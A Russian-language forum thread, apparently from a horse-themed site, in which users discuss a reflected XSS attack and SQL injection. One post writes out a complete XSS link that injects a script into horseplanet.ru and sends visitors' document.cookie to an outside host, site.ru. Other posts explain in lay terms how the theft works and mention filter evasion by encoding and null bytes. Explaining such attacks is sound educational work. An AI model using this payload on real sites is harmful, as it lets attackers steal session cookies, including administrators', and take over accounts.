Карфаген

AndreyZ ъ
Вам написать с примерами, как воровать куки?
Они подумали, что я воспользовался xss-уязвимостью.
Собственно, это атака на пользователей сайта, используя его же уязвимость.
То есть, сервер не фильтрует обработку параметров. За счет чего, можно составить(в данном случае это пассивая xss) зловредную ссылку, перейдя через которую, можно получить куки пользователя, в том числе администратора.
Самое интересное, у спартанца нет абсолютно никаких понятии о знании сети и данного способа атак.
Я сначала выложил просто ссылку с вопросом - "что это такое?"
http://site.ru, а не как положено при атаке http://horseplanet.ru/index.php='><script>img=new Image();img.src="http://site.ru/index.js+document.cookie;"+document.cookie;</script>.
В первом случае, можно заходить хоть 100 раз. От этого горячо и холодно не будет.
Во втором случае, реально провести атаку.
Так вот, меня "якобы забанили" за первую ссылку
Если интересно, могу рассказать более подробно.

Спасибо, спросил чисто из любопытства.
Конечно прикольная засада с кавычкой...

Раз уж меня тут за перевод поблагодарили переведу на человеческий язык и это.

Смотрите на ссылку:



Эксплорер думает, что он открывает сайт horseplanet.ru. Поэтому он разрешает этому сайту обращаться к своим кукам. Но эти куки должны стать именем файла картинки, якобы хранящейся на другом сайте (site.ru). И уже сам horseplanet.ru отправляет куки на site.ru, чтобы взять оттуда картинку с таким странным именем. Когда site.ru получает запрос на такую "картинку" он просто запоминает его. Сам запрос - это и есть сворованные куки.

Поучительный момент: если в ссылке видите кавычку:

Значит это попытка заставить сервер, на который вы переходите, выполнить какие-то еще действия в надежде, что он отработает их чисто механически без проверки на допустимость. Обращайте на это внимание при работе.

P.S. Сетевую систему проектировал (правда, не web) - просто пронумеровал все допустимые запросы Чтоб никакой текстовой обработки не было.

Супер!
Боглик, спасибо!

Поучительный момент: если в ссылке видите кавычку:



Насчет ковычки.
Если я вас правильно понял, сейчас вы описали не xss, а SQL Injection.
То есть, когда нет фильтрации спецсимволов в строке браузера.
Злоумышленник, обнаружив такую потенциально опасную уязвимость, пожет получить доступ к базе данных, а оттуда и ко всему сайту.
или
в зависимости от фильтрации.
От таких атак самый лучший способ это фильтровать спецсимволы..Но эту проблему легко обойти воспользовашись другими символами %00 - нулевым байтом, который отбрасывает расширение..(ой, это уже php-including))
То есть, если система блокирует ввод данных типа
, то можно провести кодирование. И строка уже получается такая:

Согласитесь, система ничего не заподозрит.
Если Вы имели xss уязвимость...думаю, при обращении строки, она

Сайт закрывает скобку, и думает, что операция завершена, когда дальше идет выполнение скрипта, то есть он ее не замечает.

Не, ну чё за низкие люди? они на большее не способны чтоль?.. Или им приятней от этого? Садисты блин, а ещё животных пытаются защищать, фу...

_________________
Нет дискриминации - я ненавижу всех! ну... кроме Спартанца, конечно же!

Moderator correction
Such offers send, please, to private